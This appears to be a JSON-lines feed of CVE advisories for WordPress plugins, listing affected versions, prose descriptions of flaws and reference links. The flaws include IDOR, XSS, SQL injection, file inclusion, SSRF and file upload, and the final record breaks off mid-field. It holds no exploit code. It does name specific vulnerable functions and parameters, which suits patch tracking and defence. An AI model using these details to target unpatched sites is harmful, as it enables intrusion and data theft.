{"CVE_ID":"CVE-2024-13425","slug":"wp-job-portal","versionImpact":"2.2.6","versionEndExcluding":"2.2.7","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.2.6 via the enforcedelete() function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Employer-level access and above, to delete other users companies.","recommendation":"Update to version 2.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229608\\\/wp-job-portal\\\/tags\\\/2.2.7\\\/modules\\\/company\\\/controller.php?old=3216415&old_path=wp-job-portal%2Ftags%2F2.2.6%2Fmodules%2Fcompany%2Fcontroller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229608\\\/wp-job-portal\\\/tags\\\/2.2.7\\\/modules\\\/company\\\/controller.php?old=3216415&old_path=wp-job-portal%2Ftags%2F2.2.6%2Fmodules%2Fcompany%2Fcontroller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a14e110f-0850-44f4-8de3-95a654096ae8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a14e110f-0850-44f4-8de3-95a654096ae8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13372","slug":"wp-job-portal","versionImpact":"2.2.6","versionEndExcluding":"2.2.7","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.2.6 via the getresumefiledownloadbyid() and getallresumefiles() functions due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to download users resumes without the appropriate authorization to do so.","recommendation":"Update to version 2.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229608\\\/wp-job-portal\\\/tags\\\/2.2.7\\\/modules\\\/resume\\\/controller.php?old=3216415&old_path=wp-job-portal%2Ftags%2F2.2.6%2Fmodules%2Fresume%2Fcontroller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229608\\\/wp-job-portal\\\/tags\\\/2.2.7\\\/modules\\\/resume\\\/controller.php?old=3216415&old_path=wp-job-portal%2Ftags%2F2.2.6%2Fmodules%2Fresume%2Fcontroller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e00e65ba-db58-4d13-8cb3-c4d62a2553fb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e00e65ba-db58-4d13-8cb3-c4d62a2553fb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13371","slug":"wp-job-portal","versionImpact":"2.2.6","versionEndExcluding":"2.2.7","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to unauthorized sending of arbitrary emails due to a missing capability check on the sendEmailToJobSeeker() function in all versions up to, and including, 2.2.6. This makes it possible for unauthenticated attackers to send arbitrary emails with arbitrary content from the site's mail server.","recommendation":"Update to version 2.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/gist.github.com\\\/g1-nhantv\\\/31b04bc057046ecc54c3552387eb7bca\",\"name\":\"https:\\\/\\\/gist.github.com\\\/g1-nhantv\\\/31b04bc057046ecc54c3552387eb7bca\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229608\\\/wp-job-portal\\\/tags\\\/2.2.7\\\/modules\\\/jobapply\\\/model.php?old=3216415&old_path=wp-job-portal%2Ftags%2F2.2.6%2Fmodules%2Fjobapply%2Fmodel.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229608\\\/wp-job-portal\\\/tags\\\/2.2.7\\\/modules\\\/jobapply\\\/model.php?old=3216415&old_path=wp-job-portal%2Ftags%2F2.2.6%2Fmodules%2Fjobapply%2Fmodel.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a84a4c56-a44e-450d-91fc-024f8ddeedee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a84a4c56-a44e-450d-91fc-024f8ddeedee?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11503","slug":"my-wp-tabs","versionImpact":"2.2.6","versionEndExcluding":"2.2.7","description":"The WP Tabs WordPress plugin before 2.2.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/25592b6c-b9ab-4d9e-b314-091594ce9189\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/25592b6c-b9ab-4d9e-b314-091594ce9189\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3477","slug":"popup-box","versionImpact":"2.2.6","versionEndExcluding":"2.2.7","description":"The Popup Box WordPress plugin before 2.2.7 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting popups via CSRF attacks","recommendation":"Update to version 2.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca5e59e6-c500-4129-997b-391cdf9aa9c7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca5e59e6-c500-4129-997b-391cdf9aa9c7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7072","slug":"post-grid","versionImpact":"2.2.68","versionEndExcluding":"2.2.69","description":"The Post Grid Combo \u2013 36+ Gutenberg Blocks plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2.68 via the 'get_posts' REST API Endpoint. This makes it possible for unauthenticated attackers to extract sensitive data including full draft posts and password protected posts, as well as the password for password-protected posts.","recommendation":"Update to version 2.2.69, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/feee3268-b384-400c-a76d-e5d7972c05b7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/feee3268-b384-400c-a76d-e5d7972c05b7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid\\\/tags\\\/2.2.68\\\/src\\\/functions-rest.php#L1670\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid\\\/tags\\\/2.2.68\\\/src\\\/functions-rest.php#L1670\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid\\\/tags\\\/2.2.69\\\/includes\\\/blocks\\\/functions-rest.php#L1670\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid\\\/tags\\\/2.2.69\\\/includes\\\/blocks\\\/functions-rest.php#L1670\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6645","slug":"post-grid","versionImpact":"2.2.64","versionEndExcluding":"2.2.65","description":"The Post Grid Combo \u2013 36+ Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom JS parameter in all versions up to, and including, 2.2.64 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.65, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab777672-6eef-4078-932d-24bb784107fa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab777672-6eef-4078-932d-24bb784107fa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3010342%40post-grid%2Ftrunk&old=2999466%40post-grid%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3010342%40post-grid%2Ftrunk&old=2999466%40post-grid%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4284","slug":"post-timeline","versionEndExcluding":"2.2.6","description":"The Post Timeline WordPress plugin before 2.2.6 does not sanitise and escape an invalid nonce before outputting it back in an AJAX response, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c126869-0afa-456f-94cc-10334964e5f9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c126869-0afa-456f-94cc-10334964e5f9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8378","slug":"safe-svg","versionImpact":"2.2.5","versionEndExcluding":"2.2.6","description":"The Safe SVG WordPress plugin before 2.2.6 only runs its sanitisation code for paths that call wp_handle_upload, but not, for example, for code that uses wp_handle_sideload, which is often used to upload attachments via raw POST data.","recommendation":"Update to version 2.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17be4bf2-486d-43ab-b87a-2117c8d77ca8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17be4bf2-486d-43ab-b87a-2117c8d77ca8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-48764","slug":"guardgiant","versionEndExcluding":"2.2.6","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in GuardGiant Brute Force Protection WordPress Brute Force Protection \u2013 Stop Brute Force Attacks. This issue affects WordPress Brute Force Protection \u2013 Stop Brute Force Attacks: from n\/a through 2.2.5.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/guardgiant\\\/wordpress-wordpress-brute-force-protection-stop-brute-force-attacks-plugin-2-2-5-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/guardgiant\\\/wordpress-wordpress-brute-force-protection-stop-brute-force-attacks-plugin-2-2-5-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5454","slug":"templately","versionImpact":"2.2.5","versionEndExcluding":"2.2.6","description":"The Templately WordPress plugin before 2.2.6 does not properly authorize the `saved-templates\/delete` REST API call, allowing unauthenticated users to delete arbitrary posts.","recommendation":"Update to version 2.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1854f77f-e12a-4370-9c44-73d16d493685\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1854f77f-e12a-4370-9c44-73d16d493685\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2288","slug":"otter-blocks","versionEndExcluding":"2.2.6","description":"The Otter WordPress plugin before 2.2.6 does not sanitize some user-controlled file paths before performing file operations on them. This leads to a PHAR deserialization vulnerability on PHP < 8.0 using the phar:\/\/ stream wrapper.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93acb4ee-1053-48e1-8b69-c09dc3b2f302\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93acb4ee-1053-48e1-8b69-c09dc3b2f302\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3275","slug":"themesflat-addons-for-elementor","versionImpact":"2.2.5","versionEndExcluding":"2.2.6","description":"The Themesflat Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the TF E Slider widget in all versions up to, and including, 2.2.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/tf-flexslider.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/tf-flexslider.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268183\\\/themesflat-addons-for-elementor\\\/tags\\\/2.2.2\\\/assets\\\/js\\\/tf-flexslider.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268183\\\/themesflat-addons-for-elementor\\\/tags\\\/2.2.2\\\/assets\\\/js\\\/tf-flexslider.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ec73a61-9ae2-4e6f-b1fa-2d61f27d6809?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ec73a61-9ae2-4e6f-b1fa-2d61f27d6809?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12131","slug":"wp-job-portal","versionImpact":"2.2.5","versionEndExcluding":"2.2.6","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.2.5 due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to submit resumes for other applicants when applying for jobs.","recommendation":"Update to version 2.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-job-portal\\\/tags\\\/2.2.6\\\/modules\\\/jobapply\\\/model.php?rev=3216415\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-job-portal\\\/tags\\\/2.2.6\\\/modules\\\/jobapply\\\/model.php?rev=3216415\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4772ab0-41cd-4b35-bda9-d72e0fd7b7a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4772ab0-41cd-4b35-bda9-d72e0fd7b7a5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8268","slug":"frontend-dashboard","versionImpact":"2.2.4","versionEndExcluding":"2.2.5","description":"The Frontend Dashboard plugin for WordPress is vulnerable to unauthorized code execution due to insufficient filtering on callable methods\/functions via the ajax_request() function in all versions up to, and including, 2.2.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to call arbitrary functions that can be leveraged for privilege escalation by changing users' passwords.","recommendation":"Update to version 2.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d66694a-c99f-44f8-8004-1a47ad9f9250?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d66694a-c99f-44f8-8004-1a47ad9f9250?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.4\\\/route\\\/class-fed-request.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.4\\\/route\\\/class-fed-request.php#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147868\\\/frontend-dashboard\\\/tags\\\/2.2.5\\\/route\\\/class-fed-request.php?old=3048034&old_path=frontend-dashboard%2Ftags%2F2.2.4%2Froute%2Fclass-fed-request.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147868\\\/frontend-dashboard\\\/tags\\\/2.2.5\\\/route\\\/class-fed-request.php?old=3048034&old_path=frontend-dashboard%2Ftags%2F2.2.4%2Froute%2Fclass-fed-request.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5526","slug":"buddypress-docs","versionImpact":"2.2.4","versionEndExcluding":"2.2.5","description":"The BuddyPress Docs WordPress plugin before 2.2.5 lacks proper access controls and allows a logged in user to view and download files belonging to another user","recommendation":"Update to version 2.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/10196cd3-5bf7-4e40-a4f7-4ff2d34d516d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/10196cd3-5bf7-4e40-a4f7-4ff2d34d516d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12132","slug":"wp-job-portal","versionImpact":"2.2.4","versionEndExcluding":"2.2.5","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.2.4 due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create jobs for companies that are unaffiliated with the attacker.","recommendation":"Update to version 2.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210251\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210251\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d19ac6fc-029f-4f19-913e-e082acecc594?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d19ac6fc-029f-4f19-913e-e082acecc594?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-23825","slug":"tablepress","versionEndExcluding":"2.2.5","description":"TablePress is a table plugin for Wordpress. For importing tables, TablePress makes external HTTP requests based on a URL that is provided by the user. That user input is filtered insufficiently, which makes it is possible to send requests to unintended network locations and receive responses. On sites in a cloud environment like AWS, an attacker can potentially make GET requests to the instance's metadata REST API. If the instance's configuration is insecure, this can lead to the exposure of internal data, including credentials. This vulnerability is fixed in 2.2.5.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/TablePress\\\/TablePress\\\/security\\\/advisories\\\/GHSA-x8rf-c8x6-mrpg\",\"name\":\"https:\\\/\\\/github.com\\\/TablePress\\\/TablePress\\\/security\\\/advisories\\\/GHSA-x8rf-c8x6-mrpg\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/TablePress\\\/TablePress\\\/commit\\\/62aab50e7a9c486caaeff26dff4dc01e059ecb91\",\"name\":\"https:\\\/\\\/github.com\\\/TablePress\\\/TablePress\\\/commit\\\/62aab50e7a9c486caaeff26dff4dc01e059ecb91\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4776","slug":"wpschoolpress","versionImpact":"2.2.4","versionEndExcluding":"2.2.5","description":"The School Management System WordPress plugin before 2.2.5 uses the WordPress esc_sql() function on a field not delimited by quotes and did not first prepare the query, leading to a SQL injection exploitable by relatively low-privilege users like Teachers.","recommendation":"Update to version 2.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/59dd3917-01cb-479f-a557-021b2a5147df\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/59dd3917-01cb-479f-a557-021b2a5147df\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0844","slug":"popup-more","versionImpact":"2.1.6","versionEndExcluding":"2.2.5","description":"The Popup More Popups, Lightboxes, and more popup modules plugin for WordPress is vulnerable to Local File Inclusion in version 2.1.6 via the ycfChangeElementData() function. This makes it possible for authenticated attackers, with administrator-level access and above, to include and execute arbitrary files ending with \"Form.php\" on the server , allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 2.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7894a19c-b873-4c5b-8c82-6656cc306ee2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7894a19c-b873-4c5b-8c82-6656cc306ee2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/popup-more\\\/trunk\\\/classes\\\/Ajax.php#L184\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/popup-more\\\/trunk\\\/classes\\\/Ajax.php#L184\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12205","slug":"themesflat-addons-for-elementor","versionImpact":"2.2.4","versionEndExcluding":"2.2.5","description":"The Themesflat Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the TF E Slider Widget in all versions up to, and including, 2.2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215859%40themesflat-addons-for-elementor&new=3215859%40themesflat-addons-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215859%40themesflat-addons-for-elementor&new=3215859%40themesflat-addons-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45c6c041-91b0-4abe-ba72-ec1251651fdb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45c6c041-91b0-4abe-ba72-ec1251651fdb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1707","slug":"review-schema","versionImpact":"2.2.4","versionEndExcluding":"2.2.5","description":"The Review Schema plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.2.4 via post meta. This makes it possible for authenticated attackers, with contributor-level and above permissions, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included.","recommendation":"Update to version 2.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/review-schema\\\/tags\\\/2.2.4\\\/app\\\/Shortcodes\\\/ReviewSchema.php#L108\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/review-schema\\\/tags\\\/2.2.4\\\/app\\\/Shortcodes\\\/ReviewSchema.php#L108\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3253799\\\/review-schema\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3253799\\\/review-schema\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9b4de243-d337-4f29-a766-bcafb3848d1c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9b4de243-d337-4f29-a766-bcafb3848d1c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7443","slug":"searchpro","versionImpact":"2.2.42","versionEndExcluding":"2.2.44","description":"The BerqWP \u2013 Automated All-In-One Page Speed Optimization for Core Web Vitals, Cache, CDN, Images, CSS, and JavaScript plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation via the store_javascript_cache.php file in all versions up to, and including, 2.2.42. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.2.44, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/searchpro\\\/trunk\\\/api\\\/store_javascript_cache.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/searchpro\\\/trunk\\\/api\\\/store_javascript_cache.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3330075\\\/searchpro\\\/trunk\\\/api\\\/register_apis.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3330075\\\/searchpro\\\/trunk\\\/api\\\/register_apis.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d7dc644-ab83-4f03-998a-ec8eda695161?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d7dc644-ab83-4f03-998a-ec8eda695161?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0074","slug":"wp-social-widget","versionEndExcluding":"2.2.4","description":"The WP Social Widget WordPress plugin before 2.2.4 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/82f543e3-9397-4364-9546-af5ea134fcd4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/82f543e3-9397-4364-9546-af5ea134fcd4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11461","slug":"form-data-collector","versionImpact":"2.2.3","versionEndExcluding":"2.2.4","description":"The Form Data Collector plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 2.2.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/form-data-collector\\\/tags\\\/2.2.3\\\/index.php#L165\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/form-data-collector\\\/tags\\\/2.2.3\\\/index.php#L165\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3199031%40form-data-collector&new=3199031%40form-data-collector&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3199031%40form-data-collector&new=3199031%40form-data-collector&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dba72ee-7c38-4e10-9c0c-35d12aa83442?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dba72ee-7c38-4e10-9c0c-35d12aa83442?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13474","slug":"ltl-freight-quotes-purolator-freight-edition","versionImpact":"2.2.3","versionEndExcluding":"2.2.4","description":"The LTL Freight Quotes \u2013 Purolator Edition plugin for WordPress is vulnerable to SQL Injection via the 'dropship_edit_id' and 'edit_id' parameters in all versions up to, and including, 2.2.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.2.4, or a newer patched 